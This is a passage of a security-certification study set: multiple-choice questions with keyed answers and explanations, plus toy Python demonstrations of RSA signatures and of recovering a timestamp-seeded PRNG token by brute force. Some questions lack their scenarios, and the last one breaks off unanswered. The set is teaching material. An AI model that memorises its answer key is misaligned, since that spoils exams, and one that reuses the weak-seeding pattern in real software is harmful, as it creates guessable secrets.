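primes, no padding) so it runs with only the standard library. INSECURE:
for illustrating the flow, never for real use.
"""
import hashlib
from typing import Tuple

# Toy RSA parameters (constructed; far too small to be secure).
P, Q = 1000003, 1000033
N = P * Q
PHI = (P - 1) * (Q - 1)
E = 65537
D = pow(E, -1, PHI)          # private exponent (modular inverse, Python 3.8+)

KEVIN_PUBLIC: Tuple[int, int] = (N, E)   # known to everyone
KEVIN_PRIVATE: Tuple[int, int] = (N, D)  # known only to Kevin


def digest(message: bytes) -> int:
    """One-way hash of the message, reduced mod N so it fits the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def sign(message: bytes, private_key: Tuple[int, int]) -> int:
    """Sender: hash the message, then 'encrypt' the digest with the private key."""
    n, d = private_key
    return pow(digest(message), d, n)


def verify(message: bytes, signature: int, public_key: Tuple[int, int]) -> bool:
    """Receiver: recover the digest with the sender's public key and compare it
    with a freshly computed hash of the received message."""
    n, e = public_key
    recovered = pow(signature, e, n)
    return recovered == digest(message)


if __name__ == "__main__":
    msg = b"Transfer 100 to Maureen"
    sig = sign(msg, KEVIN_PRIVATE)
    print("valid:     ", verify(msg, sig, KEVIN_PUBLIC))
    print("tampered:  ", verify(b"Transfer 1000 to Maureen", sig, KEVIN_PUBLIC))
    print("bad sig:   ", verify(msg, sig + 1, KEVIN_PUBLIC))
```

The three outcomes map onto the three services named in the answer: a changed message fails (integrity), a changed signature fails (authentication, since only the private key produces a signature the public key accepts), and because that private key is Kevin's alone he cannot later deny having signed (nonrepudiation). Nothing here is encrypted, which is why a signature on its own gives no confidentiality.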

What is a pretext? A. A false scenario presented to an employee by management with the intent to socially engineer the employee into better performance of their duties. B. Textual information designed to facilitate future instant messaging. C. A false scenario presented to an employee by an attacker with the intent to socially engineer the employee into violating security controls on the attacker's behalf. D. The banner information presented via a text-based protocol to the body of the message.

C. A false scenario presented to an employee by an attacker with the intent to socially engineer the employee into violating security controls on the attacker's behalf.

Which of the following is a cost-effective countermeasure that Don's team should implement? A. Stateful firewall B. Network address translation C. SYN proxy D. IPv6

C. A half-open attack is a type of DoS that is also referred to as a SYN flood. To thwart this type of attack, Don's team can use SYN proxies, which limit the number of open and abandoned network connections. The SYN proxy is a piece of software that resides between the sender and receiver, and only sends TCP traffic to the receiving system if the TCP handshake process completes successfully.

Which best describes a quantitative risk analysis? A. A scenario-based analysis to research different security threats B. A method used to apply severity levels to potential loss, probability of loss, and risks C. A method that assigns monetary values to components in the risk assessment D. A method that is based on gut feelings and opinions

C. A method that assigns monetary values to components in the risk assessment

Within the realm of network components, what are "endpoints" and why do they pose such difficult security challenges? A. Endpoints are the client systems on a network. Because they establish connections to both internal and external servers, their activities can be difficult to monitor and control, and downloads of malicious software into the environment are commonplace. B. Endpoints are the servers to which all the clients connect for authentication, file sharing, and other services. Due to the high volume of connections they support, it can be difficult to monitor and detect malicious activity directed at them, buried among the normal activities. C. Endpoints are everything except the network communication devices, including desktops, servers, mobile devices, and other embedded systems. The management challenges they pose include intermittent connectivity, lack of management infrastructure for some platforms, and the unavailability of software updates for others. D. Endpoints are primarily desktop and mobile systems, which may or may not exist statically on the network. As a result, keeping track of them in order to maintain up-to-date patching and proper configuration can be difficult.

C. A network "endpoint" is anything and everything that is not an infrastructure device. In an Active Directory environment, both desktops and servers may have a robust management and patching regime. However, other endpoints include printers, mobile devices, point of sale (POS) systems, Internet of Things (IoT) devices, and industrial control system (ICS) devices like heating, ventilation, and air conditioning (HVAC) controllers. For many of these platforms, there may simply be no enterprise-scale management infrastructure available, and patching against known vulnerabilities may not be possible.

Brian has been asked to work on the virtual directory of his company's new identity management system. Which of the following best describes a virtual directory? A. Meta-directory B. User attribute information stored in an HR database C. Virtual container for data from multiple sources D. A service that allows an administrator to configure and manage how identification takes place

C. A network directory is a container for users and network resources. One directory does not contain (or know about) all of the users and resources within the enterprise, so a collection of directories must be used. A virtual directory gathers the necessary information used from sources scattered throughout the network and stores them in a central virtual directory (virtual container). This provides a unified view of all users' digital identity information throughout the enterprise. The virtual directory periodically synchronizes itself with all of the identity stores (individual network directories) to ensure the most up-to-date information is being used by all applications and identity management components within the enterprise.

Jack has been told that successful attacks have been taking place and data that has been encrypted by his company's software systems has leaked to the company's competitors. Through Jack's investigation he has discovered that the lack of randomness in the seeding values used by the encryption algorithms in the company's software exposed patterns and allowed for successful reverse engineering. Which of the following is most likely the item that is the root of the problem when it comes to the necessary randomness explained in the scenario? A. Asymmetric algorithm B. Out-of-band communication compromise C. Number generator D. Symmetric algorithm

C. A number generator is used to create a stream of random values and must be seeded by an initial value. This piece of software obtains its seeding value from some component within the computer system (time, CPU cycles, etc.). Although a computer system is complex, it is a predictable environment, so if the seeding value is predictable in any way, the resulting values created are not truly random, but pseudorandom. If the values from a number generated illustrate patterns and those patterns are recognizable during cryptographic processes, this weakness could allow an attacker to reverse-engineer the algorithm and gain access to confidential data.
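The weakness in the answer above, made concrete as an added example that is not part of the original study set: a token generator that seeds a general-purpose PRNG from a coarse timestamp (the guessable seed) so the "random" output can be reproduced by anyone who can narrow down when it was generated, beside the fix of drawing from the operating system's CSPRNG. The token format, the one-hour window and the timestamp are assumptions for the illustration.

```python
"""Predictable seeding turns a PRNG into a pattern an attacker can replay.

Added example, not from the study set. The weak generator is constructed to
mimic seeding from a coarse clock value; the time window is an assumption.
"""
import random
import secrets
from typing import Optional

ALPHABET = "0123456789abcdef"


def weak_token(seed_time: int) -> str:
    """Mistake: seed a deterministic PRNG from a value an attacker can guess."""
    rng = random.Random(seed_time)        # same seed -> identical 'random' stream
    return "".join(rng.choice(ALPHABET) for _ in range(32))


def recover_seed(observed_token: str, window_start: int, window_end: int) -> Optional[int]:
    """Attacker: knowing roughly when the token was issued, try every candidate seed."""
    for t in range(window_start, window_end):
        if weak_token(t) == observed_token:
            return t
    return None


def strong_token() -> str:
    """Fix: the OS CSPRNG has no user-visible seed to reproduce."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    issued_at = 1_700_000_000                     # constructed timestamp
    token = weak_token(issued_at)
    found = recover_seed(token, issued_at - 3600, issued_at + 3600)
    print("weak token recovered from seed:", found == issued_at)
    print("strong token recoverable:", recover_seed(strong_token(), issued_at - 3600, issued_at + 3600))
```

The attacker never breaks the PRNG; they simply re-run it with each plausible seed until the output matches, which is what "recognizable patterns" amounts to here. Seeding from high-resolution time, PIDs or uptime only widens the window somewhat; the real fix is an entropy source designed for the purpose.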

Sally is carrying out a software analysis on her company's proprietary application. She has found out that it is possible for an attacker to force an authorization step to take place before the authentication step is completed successfully. What type of issue would allow for this type of compromise to take place? A. Back door B. Maintenance hook C. Race condition D. Data validation error

C. A race condition is when processes carry out their tasks on a shared resource and there is a potential that the sequence is carried out in the wrong order. A race condition is possible when two or more processes use a shared resource, as in data within a variable. It is important that the processes carry out their functionality in the correct sequence. If process 2 carried out its task on the data before process 1, the result will be much different than if process 1 carried out its tasks on the data before process 2. If authentication and authorization steps are split into two functions, there is a possibility an attacker could use a race condition to force the authorization step to be completed before the authentication step.

What is the difference between a "penetration test" and a "red team exercise"? A. there is no difference. Both terms can be used interchangeably for the same activities. B. A red team exercise seeks to examine whether a set of exploitable vulnerabilities exist in an environment and can lead to compromise, whereas a penetration test seeks to explore how any aspect of an organization can be subverted by an adversary. C. A red team exercise is most likely to uncover problems beyond mere software or system vulnerabilities, whereas a penetration test focuses on technical issues that have not been remediated. D. A penetration test is more likely to uncover problems beyond mere software or system vulnerabilities, whereas a red team exercise focuses on technical issues that have not been remediated.

C. A red team exercise is most likely to uncover problems beyond mere software or system vulnerabilities, whereas a penetration test focuses on technical issues that have not been remediated.

Terry is told by his boss that he needs to implement a networked-switched infrastructure that allows several systems to be connected to any storage device. What does Terry need to roll out? A. Electronic vaulting B. Hierarchical storage management C. Storage area network D. Remote journaling

C. A storage area network (SAN) is made up of several storage systems that are connected together to form a single storage network. A SAN is a networked infrastructure that allows several systems to be connected to any storage device. This is usually provided by using switches to create a switching fabric. The switching fabric allows for several devices to communicate with back-end storage devices and provides redundancy and fault tolerance by not depending upon one specific line or connection.

What is the difference between least privilege and need to know? A. A user should have least privileges that restrict her need-to-know. B. A user should have a security clearance to access resources, a need-to-know about those resources, and least privilege to give her full control of all resources. C. A user should have a need-to-know to access particular resources; least privilege should be implemented to ensure she only accesses the resources she has a need-to-know. D. They are two terms for the same issue.

C. A user should have a need-to-know to access particular resources; least privilege should be implemented to ensure she only accesses the resources she has a need-to-know.

A user's digital identity is commonly made up of more than just a username. Which of the following is not a common item that makes up a user's identity? A. Entitlements B. Traits C. Figures D. Attributes

C. A user's identity is commonly a collection of her attributes (department, role in company, shift time, clearance, and others), her entitlements (resources available to her, authoritative rights in the company, and so on), and her traits (biometric information, height, gender, and so forth).

Drew determines that the cost of buying anti-spyware for technician laptops exceeds the loss expectancy if spyware threats were to happen. Drew should ___ the risk. A. Mitigate B. Eliminate C. Accept D. Transfer

C. Accept

During a post-mortem incident evaluation, it is discovered that coercion was used by an attacker to infiltrate the company and obtain confidential information. This tactic would best be characterized as: A. Eavesdropping. B. Passive. C. Active. D. Sniffing.

C. Active.

Which of the following best describes what role-based access control offers companies in reducing administrative burdens? A. It allows entities closer to the resources to make decisions about who can and cannot access resources. B. It provides a centralized approach for access control, which frees up department managers. C. User membership in roles can be easily revoked and new ones established as job assignments dictate. D. It enforces an enterprise-wide security policy, standards, and guidelines.

C. An administrator does not need to revoke and reassign permissions to individual users as they change jobs. Instead, the administrator assigns permissions and rights to a role, and users are plugged into those roles.

Which of the following is not considered an anomaly-based intrusion protection system? A. Statistical anomaly-based B. Protocol anomaly-based C. Temporal anomaly-based D. Traffic anomaly-based

C. An anomaly-based IPS is a behavioral-based system that learns the "normal" activities of an environment. The three types are: Statistical anomaly-based, which creates a profile of "normal" and compares activities to this profile; Protocol anomaly-based, which identifies protocols used outside of their common bounds; and Traffic anomaly-based, which identifies unusual activity in network traffic.

Which of the following best describes how SAML, SOAP, and HTTP commonly work together in an environment that provides web services? A. The security attributes are put into SAML format. The web service request and the authentication data are encrypted in a SOAP message. The message is transmitted in an HTTP connection. B. The security attributes are put into SAML format. The web service request and the authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection over TLS. C. The authentication data is put into SAML format. The web service request and authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection. D. The authentication data is put into SAML format. The HTTP request and the authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection.

C. As an example, when you log in to your company's portal and double-click a link (e.g., Salesforce), your company's portal will take this request and your authentication data and package them up in a Security Assertion Markup Language (SAML) format and encapsulate that data into a Simple Object Access Protocol (SOAP) message. This message would be transmitted over an HTTP connection to the Salesforce vendor site, and once you are authenticated you can interact with the vendor software. SAML packages up authentication data, SOAP packages up web service requests and SAML data, and the request is transmitted over an HTTP connection.

Hanna is a security manager of a company that relies heavily on one specific operating system. The operating system is used in the employee workstations and is embedded within devices that support the automated production line software. She has uncovered that the operating system has a vulnerability that could allow an attacker to force applications to not release memory segments after execution. Which of the following best describes the type of threat this vulnerability introduces? A. Injection attacks B. Memory corruption C. Denial of service D. Software locking

C. Attackers have identified programming errors in operating systems that allow them to "starve" the system of its own memory. This means the attackers exploit a software vulnerability that ensures that processes do not properly release their memory resources. Memory is continually committed and not released, and the system is depleted of this resource until it can no longer function. This is an example of a denial-of-service attack.

Why should the team that will perform and review the risk analysis information be made up of people in different departments? A. To make sure the process is fair and that no one is left out. B. It shouldn't. It should be a small group brought in from outside the organization because otherwise, the analysis is biased and unusable. C. Because people in different departments understand the risks of their department. Thus, it ensures the data going into the analysis is as close to reality as possible. D. Because the people in the different departments are the ones causing the risks, so they should be the ones held accountable.

C. Because people in different departments understand the risks of their department. Thus, it ensures the data going into the analysis is as close to reality as possible.

What role does biometrics play in access control? A. Authorization B. Authenticity C. Authentication D. Accountability

C. Biometrics is a technology that validates an individual's identity by reading a physical attribute. In some cases, biometrics can be used for identification, but that was not listed as an answer choice.

Which of the following refers to the assessment of a system by someone with no advance knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. Black box testing. D. Blue box testing.

C. Black box testing.

What is generally the safest, most secure way to acquire software? A. From a reputable vendor of proprietary software, once tested in the deployment environment B. Downloading very popular open-source software that has been inspected for bugs by a large and active community C. Downloading either proprietary or open-source software, but fuzzing it in a lab environment prior to deployment D. Downloading open-source software and deploying it only after the code base has been verified by cryptographic checksum

C. Black-box testing all software in a lab environment is the best way to uncover both feature and security defects prior to deployment into a sensitive environment.

Which of the following correctly describes Bluejacking? A. Bluejacking is a harmful, malicious attack. B. It is the process of taking over another portable device via a Bluetooth-enabled device. C. It is commonly used to send contact information. D. The term was coined by the use of a Bluetooth device and the act of hijacking another device.

C. Bluetooth is vulnerable to an attack called Bluejacking, which entails an attacker sending an unsolicited message to a device that is Bluetooth-enabled. Bluejackers look for a receiving device, such as a mobile device or laptop, and then send a message to it. Often, the Bluejacker is trying to send their business card to be added to the victim's contact list in their address book. The countermeasure is to put the Bluetooth-enabled device into nondiscoverable mode so that others cannot identify this device in the first place. If you receive some type of message this way, just look around you. Bluetooth only works within a 10-meter distance, so it is coming from someone close by.

Increased developmental testing and the use of only operational data are good remedies to what operational security threat? A. Employee shoulder surfing B. System incompatibility C. Buffer overflows D. Firewall avoidance.

C. Buffer overflows

Which of the following is Charlie most likely concerned with in this situation? A. Injection attacks. B. Memory block. C. Buffer overflows. D. Browsing attacks.

C. Buffer overflows.

Which protocol is commonly used to authenticate users on dial-up connections? A. PPTP B. IPSec C. CHAP D. L2F

C. CHAP

Ethernet uses what type of access method? A. CSMD. B. Polling. C. CSMA. D. Token passing.

C. CSMA

Widgets, Inc.'s software development processes are documented, and the organization is capable of producing its own standard of software processes. Which of the following Capability Maturity Model Integration levels best describes Widgets, Inc.? A. Initial B. Repeatable C. Defined D. Managed

C. Capability Maturity Model Integration (CMMI) is a process improvement concept that consists of a collection of techniques used in an organization's software development process to design and further enhance software. The CMMI provides a standard for the software development process by which the level of maturity of the development process can be measured. The CMMI is classified into five levels, which are Initial, Repeatable, Defined, Managed, and Optimizing. The categorization of these levels depends upon the maturity of the software development and its quality assurance. The basis of the Defined level (CMMI Level 3) is that organizations are capable of producing their own standard of software processes. These processes are improved with the passage of time.

Which model introduced five levels with which the development of an organization's software process is evaluated? A. Total Quality model (TQM) B. IDEAL Model C. Capability Maturity Model Integration. D. Spiral Model.

C. Capability Maturity Model Integration.

There are several components involved with steganography. Which of the following refers to a file that has hidden information in it? A. stegomedium. B. concealment cipher. C. Carrier. D. payload.

C. Carrier.

If a component fails, a system should be designed to do which of the following? A. Change to a protected execution domain B. Change to a problem state C. Change to a more secure state D. Release all data held in volatile memory

C. Change to a more secure state

A company has decided that it no longer wants to maintain its own servers and network environment because of increasing costs and liabilities. The company wants to move to a cloud-based solution, but needs to determine which type of solution best fits its needs. Which of the following provides a correct definition and mapping of a typical cloud-based solution? A. Infrastructure as a Service is provided when a cloud provider delivers a computing platform that includes operating system, database, and web servers. B. Software as a Service is provided when a cloud provider delivers an infrastructure environment similar to a traditional data center. C. Platform as a Service is provided when a cloud provider delivers a computing platform that can include operating system, database, and web servers. D. Software as a Service is provided when a cloud provider delivers a software environment in the form of a computing platform.

C. Cloud computing is a general term that describes how network and server technology can be aggregated and virtualized and then partitioned to provide individual customers specific computing environments. This centralized aggregation and centralized control provides end users with on-demand self-service, broad access across multiple devices, resource pooling, rapid elasticity, and service metering capability. There are different types of cloud computing offerings. Platform as a Service (PaaS) is in place when a cloud provider delivers a computing platform, such as an operating system, database, and web server, as a holistic execution environment. Where Infrastructure as a Service (IaaS) is the "raw IT network," PaaS is the software environment that runs on top of the IT network.

Which of the following best describes an operation that allows changes to a database to be available to all applications and users? A. Rollback B. Deadlock C. Commit D. Submit

C. Commit.

TCSEC, ITSEC, CTCPEC, and the Federal Criteria were used to create what? A. Orange Book. B. Rainbow Series. C. Common Criteria. D. Red Book.

C. Common Criteria.

Which of the following is the best description of a component-based system development method? A. Components periodically revisit previous stages to update and verify design requirements B. Minimizes the use of arbitrary transfer control statements between components C. Uses independent and standardized modules that are assembled into serviceable programs D. Implemented in module-based scenarios requiring rapid adaptations to changing client requirements

C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces to communicate with each other. Component-based development adds reusability and pluggable functionality into programs, and is widely used in modern programming to augment program coherence and substantially reduce software maintenance costs. A common example of these modules is "objects" that are frequently used in object-oriented programming.

Management of changes made to a system's hardware, software, or firmware throughout its operational life cycle is referred to as what? A. Media control. B. Program library. C. Configuration management. D. Operational security.

C. Configuration management.

Which of the following reasons why a disaster recovery plan gets outdated is not true? A. Personnel turnover. B. Extensive plans can take a lot of work to maintain. C. Continuous auditing makes a disaster recovery plan irrelevant. D. Infrastructure and environment changes.

C. Continuous auditing makes a disaster recovery plan irrelevant.

Tim is purchasing a smart card solution for his company. He needs to be aware of the various attacks that can take place against smart cards. Which of the following is not an example of a side-channel attack? A. Differential power analysis. B. Electromagnetic emission C. Corruptive D. Timing.

C. Corruptive

What discipline combines the physical environment and the sociological issues that surround it to reduce crime rates and the fear of crime? A. Layered defense model. B. Target hardening. C. Crime prevention through environmental design. D. Natural access control.

C. Crime prevention through environmental design.

What does DEA stand for? A. Data Encoding Algorithm B. Data Encoding Application C. Data Encryption Algorithm D. Digital Encryption Algorithm

C. DEA is the algorithm that fulfilled the DES standard. So DEA has all of the attributes of DES: a symmetric block cipher that uses 64-bit blocks, 16 rounds, and a 56-bit key.

With respect to data loss prevention (DLP), what term describes the ability to quickly recover from a crisis and to avoid catastrophe, even in the face of an ongoing breach? A. Network DLP (NDLP) B. Endpoint DLP (EDLP) C. DLP resiliency. D. DLP recovery.

C. DLP resiliency.

A network segment located between the protected and unprotected network is called a ____? A. Honeypot B. Safe Zone C. DMZ D. VPN

C. DMZ

Tim's development team is designing a new operating system. One of the requirements of the new product is that critical memory segments need to be categorized as non-executable, with the goal of reducing malicious code from being able to execute instructions in privileged mode. The team also wants to make sure that attacks will have a difficult time predicting execution target addresses. Which of the following best describes the type of protection that needs to be provided by this product? A. Hardware isolation B. Memory induction application. C. Data Execution prevention. D. Domain isolation protection.

C. Data Execution prevention.

If a company wants to protect fax data while it is in transmission, which of the following are valid mechanisms? A. PGP and MIME. B. PEM and TLS. C. Data link encryption or fax encryptor. D. Data link encryption and PKI.

C. Data link encryption or fax encryptor.

McKenna performs the following data tasks: 1.) Assigns data classification levels to meet her business unit's specific needs. 2.) Determines which users can access data. 3.) Verifies security controls are in place and working correctly. Which of the following roles is McKenna performing? A. Data custodian B. Data user C. Data owner D. Process owner

C. Data owner

Which of the following statements is true with respect to discovery in a legal case? A. Data that has been deleted within its retention period is not subject to discovery. B. Data that has been retained past its retention period is not subject to discovery. C. Data that has been retained due to a retention requirement is subject to discovery. D. Data that has been purged after its retention requirement is subject to discovery.

C. Data that has been retained due to a retention requirement is subject to discovery.

Lisa has learned that most databases implement concurrency controls. What is concurrency, and why must it be controlled? A. Processes running at different levels, which can negatively affect the integrity of the database if not properly controlled B. The ability to deduce new information from reviewing accessible data, which can allow an inference attack to take place C. Processes running simultaneously, which can negatively affect the integrity of the database if not properly controlled D. Storing data in more than one place within a database, which can negatively affect the integrity of the database if not properly controlled

C. Databases are commonly used by many different applications simultaneously and by many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other's data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else.

Which of the following centralized access control protocols would a security professional choose if her network consisted of multiple protocols, including Mobile IP, and had users connecting via wireless and wired transmissions? A. RADIUS B. TACACS+ C. Diameter D. Kerberos

C. Diameter is a more diverse centralized access control administration technique than RADIUS and TACACS+ because it supports a wide range of protocols that often accompany wireless technologies. RADIUS supports PPP, SLIP, and traditional network connections. TACACS+ is a RADIUS-like protocol that is Cisco-proprietary. Kerberos is a single sign-on technology, not a centralized access control administration protocol that supports all stated technologies.

Aaron is a security manager who needs to develop a solution to allow his company's mobile devices to be authenticated in a standardized and centralized manner using digital certificates. The applications these mobile clients use require a TCP connection. Which of the following is the best solution for Aaron to implement? A. SESAME using PKI B. RADIUS using EAP C. Diameter using EAP D. RADIUS using TTLS

C. Diameter is a protocol that has been developed to build upon the functionality of RADIUS and to overcome many of its limitations. Diameter is an AAA protocol that provides the same type of functionality as RADIUS and TACACS+ but also provides more flexibility and capabilities, including working with EAP. RADIUS uses UDP and cannot deal effectively with remote access, IP mobility, and policy control.

Which of the following protocols work in the following layers: application, data link, network, and transport? A. FTP, ARP, TCP, and UDP B. FTP, ICMP, IP, and UDP C. TFTP, ARP, IP, and UDP D. TFTP, RARP, IP, and ICMP

C. Different protocols have different functionalities. The OSI model is an attempt to describe conceptually where these different functionalities take place in a networking stack. The model attempts to draw boxes around reality to help people better understand the stack. Each layer has a specific functionality and has several different protocols that can live at that layer and carry out that specific functionality. These listed protocols work at these associated layers: TFTP (application), ARP (data link), IP (network), and UDP (transport).

The graphic shown here illustrates how which of the following works? A. Rainbow tables B. Dictionary attack C. One-time password D. Strong Authentication

C. Different types of one-time passwords are used for authentication. This graphic illustrates a synchronous token device, which synchronizes with the authentication service by using time or a counter as the core piece of the authentication process.

Which of the following describes a structured walk-through test during disaster recovery testing? A. It is performed to ensure that critical systems will run at the alternate site. B. All departments receive a copy of the recovery plan to review it for completeness. C. Representatives from each department come together and go through the test collectively. D. Normal operations are shut down.

C. During a structured walk-through test, functional representatives meet and review the plan to ensure its accuracy and that it correctly and accurately reflects the company's recovery strategy by walking through it step-by-step.

What do the SA values in the graphic of IPSec that follows represent? A. Security parameter index B. Security ability C. Security association D. Security assistant

C. Each IPSec VPN device will have at least one security association (SA) for each secure connection it uses. The SA, which is critical to the IPSec architecture, is a record of the configurations the device needs to support an IPSec connection over a VPN connection. When two devices complete their handshaking process, which means they have agreed upon a long list of parameters they will use to communicate, these data must be recorded and stored somewhere, which is in the SA. The SA can contain the authentication and encryption keys, the agreed-upon algorithms, the key lifetime, the source IP address, and other information. When a device receives a packet via the IPSec protocol, it is the SA that tells the device what to do with the packet. So if device B receives a packet from device C via IPSec, device B will look to the corresponding SA to tell it how to decrypt the packet, how to properly authenticate the source of the packet, which key to use, and how to reply to the message if necessary.

Which of the following attributes is used to biometrically authenticate a user's identity? A. Something you know B. Something you have C. Something you are D. Someplace you are

C. Each of "something you know," "something you have," and "something you are" is a classic factor of authentication used to validate a user's claim of identity. Biometric authentication seeks to authenticate a user based on some unique physical attribute of the user, such as a fingerprint, the granularly pixelated color pattern of the iris of the eye, or the digitized pattern of a voice. This is innate to the user, and so comprises "something you are."

More organizations are outsourcing business functions to allow them to focus on their core business functions. Companies use hosting companies to maintain websites and e-mail servers, service providers for various telecommunication connections, disaster recovery companies for co-location capabilities, cloud computing providers for infrastructure or application services, developers for software creation, and security companies to carry out vulnerability management. Which of the following items should be included during the analysis of an outsourced partner or vendor? i. Conduct onsite inspection and interviews ii. Review contracts to ensure security and protection levels are agreed upon iii. Ensure service level agreements are in place iv. Review internal and external audit reports and third-party reviews v. Review references and communicate with former and existing customers vi. Review Better Business Bureau reports A. ii, iii, iv B. iv, v, vi C. All of them D. i, ii, iii

C. Each of these items should be considered before committing to an outsource partner or vendor.

Encryption and decryption can take place at different layers of an operating system, application, and network stack. End-to-end encryption happens within the _____. IPSec encryption takes place at the _____ layer. PPTP encryption takes place at the _____ layer. Link encryption takes place at the _____ and _____ layers. A. applications, transport, data link, data link, physical B. applications, transport, network, data link, physical C. applications, network, data link, data link, physical D. network, transport, data link, data link, physical

C. End-to-end encryption happens within the applications. IPSec encryption takes place at the network layer. PPTP encryption takes place at the data link layer. Link encryption takes place at the data link and physical layers.

A new security policy has recently been put into place to achieve many company objectives. Which of the following objectives could not be achieved by a security policy? A. Ensuring that all data has a high level of integrity. B. Reducing levels of fraudulent activity by employees. C. Ensuring higher levels of data accuracy D. Ensuring higher levels of security awareness by employees.

C. Ensuring higher levels of data accuracy

Which of the following is the least important aspect of resource provisioning? A. Ensuring that a new system has been properly secured for deployment. B. Ensuring that the hardware being deployed is being properly tracked as part of asset management. C. Ensuring that the new resource properly expands enterprise capacity. D. Ensuring that the software being deployed is being properly tracked as part of asset management.

C. Ensuring that the new resource properly expands enterprise capacity.

What type of database software integrity service guarantees that tuples are uniquely identified by primary key values? A. Concurrent integrity B. Referential integrity C. Entity integrity D. Semantic integrity

C. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A tuple is a row in a two-dimensional database. A primary key is a value in the corresponding column that makes each row unique. For the sake of entity integrity, every tuple must contain one primary key. If a tuple does not have a primary key, it cannot be referenced by the database.

Most threats to a company stem from: A. Disgruntled employees B. Fire, water, and electrical hazards C. Errors and omissions D. Outsider threats.

C. Errors and omissions

The operations manager has established the use of uniform checklists for all server maintenance. What has the operations manager done? A. Established a baseline. B. Established a regulation C. Established a standard. D. Established a policy.

C. Established a standard.

Use the following scenario to answer Questions 15-17. Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes Steve's confusion? A. Certification must happen first before the evaluation process can begin. B. Accreditation is the acceptance from management, which must take place before the evaluation process. C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. D. Evaluation requirements include certification and accreditation components.

C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. Evaluations are carried out by qualified third parties who use specific evaluation criteria (e.g., Common Criteria) to assign an assurance rating to a tested product. A certification process is a technical review commonly carried out internally to an organization, and accreditation is management's formal acceptance that is carried out after the certification process. A system can be certified internally by a company and not pass an evaluation testing process because they are completely different things.

Which of the following is not considered a delaying mechanism? A. Locks B. Defense-in-depth measures C. Warning signs D. Access controls

C. Every physical security program should have delaying mechanisms, which have the purpose of slowing down an intruder so security personnel can be alerted and arrive at the scene. A warning sign is a deterrence control, not a delaying control.

The trusted computing base (TCB) ensures security within a system when a process in one domain must access another domain in order to retrieve sensitive information. What function does the TCB initiate to ensure that this is done in a secure manner? A. I/O operational execution. B. Process deactivation. C. Execution domain switching. D. Virtual memory to real memory mapping.

C. Execution domain switching.

Bringing in third-party auditors has advantages over using an internal team. Which of the following is not true about using external auditors? A. They are required by certain governmental regulations. B. They bring experience gained by working in many other organizations. C. They know the organization's processes and technology better than anyone else. D. They are less influenced by internal culture and politics.

C. External auditors have certain advantages over in-house teams, but they will almost certainly not be as knowledgeable of internal processes and technology as the folks who deal with them on a daily basis.

Choose the term that describes an audit performed to demonstrate that an organization is complying with its contractual obligations to another organization. A. Internal audit B. Third-party audit C. External audit D. Compliance audit

C. External audits are used to ensure that contractors are meeting their contractual obligations, so that is the best answer. A compliance audit would apply to regulatory or industry standards and would almost certainly be a third-party audit, which makes answer D a poor fit in most cases.

Assigning data classification levels can help with all of the following except: A. The grouping of classified information with hierarchical and restrictive security B. Ensuring that nonsensitive data is not being protected by unnecessary controls C. Extracting data from a database D. Lowering the costs of protecting data

C. Extracting data from a database

In the United States, federal agencies must adhere to Federal Information Processing Standard (FIPS) 201-2 "Personal Identity Verification," which discusses technical measures of authentication for federal employees and contractors. This standard must be followed in order to ensure which of the following? A. That government employees are properly cleared for the work assigned B. That government employees are only allowed access to data of their clearance level C. That the identity of the government employee has been appropriately verified D. That the data that government employees have access to has been appropriately classified

C. FIPS 201-2 specifies the U.S. government standards for Personal Identity Verification (PIV), giving varying requirements of assurance. Access by government employees and contracted agents to restricted information hinges on their level of clearance and their need to know it, but first and foremost the government requires assurance that the individual is who they say they are.

Which of the following is not a correct characteristic of the Failure Modes and Effect Analysis (FMEA) method? A. Determining functions and identifying functional failures B. Assessing the causes of failure and their failure effects through a structured process C. Structured process carried out by an identified team to address high-level security compromises D. Identifying where something is most likely going to break and either fixing the flaws that could cause this issue or implementing controls to reduce the impact of the break

C. Failure Modes and Effect Analysis (FMEA) is a method for determining functions, identifying functional failures, and assessing the causes of failure and their failure effects through a structured process. It is commonly used in product development and operational environments. The goal is to identify where something is most likely going to break and either fix the flaws that could cause this issue or implement controls to reduce the impact of the break.

Which of the following provides a true characteristic of a fault tree analysis? A. Fault trees are assigned qualitative values to faults that can take place over a series of business processes. B. Fault trees are assigned failure mode values. C. Fault trees are labeled with actual numbers pertaining to failure probabilities. D. Fault trees are used in a stepwise approach to software debugging.

C. Fault tree analysis follows this general process. First, an undesired effect is taken as the root, or top, event of a tree of logic. Then, each situation that has the potential to cause that effect is added to the tree as a series of logic expressions. Fault trees are then labeled with actual numbers pertaining to failure probabilities.

The data owner is most often described by all of the following except A. Manager in charge of a business unit B. Ultimately responsible for the protection of the data C. Financially liable for the loss of the data D. Ultimately responsible for the use of the data

C. Financially liable for the loss of the data

For an enterprise security architecture to be successful in its development and implementation, which of the following items must be understood and followed? i. Strategic alignment ii. Process enhancement iii. Business enablement iv. Security effectiveness A. i, ii B. ii, iii C. i, ii, iii, iv D. iii, iv

C. For an enterprise security architecture to be successful in its development and implementation, the following items must be understood and followed: strategic alignment, process enhancement, business enablement, and security effectiveness.

Why is a "Methodology" section as critical to a technical security assessment report as the findings themselves? A. It isn't. The findings and suggested mitigations are far more important. B. It helps management understand the value of the expensive tools that have been purchased to conduct the assessment, and the expense of the effort it took to use them to produce the results. C. It describes how the tests can be repeated by others to validate the results as required, and to further validate that mitigations, once deployed, have been effective. D. It provides the audience with the context of how, where, and why the inspection was conducted.

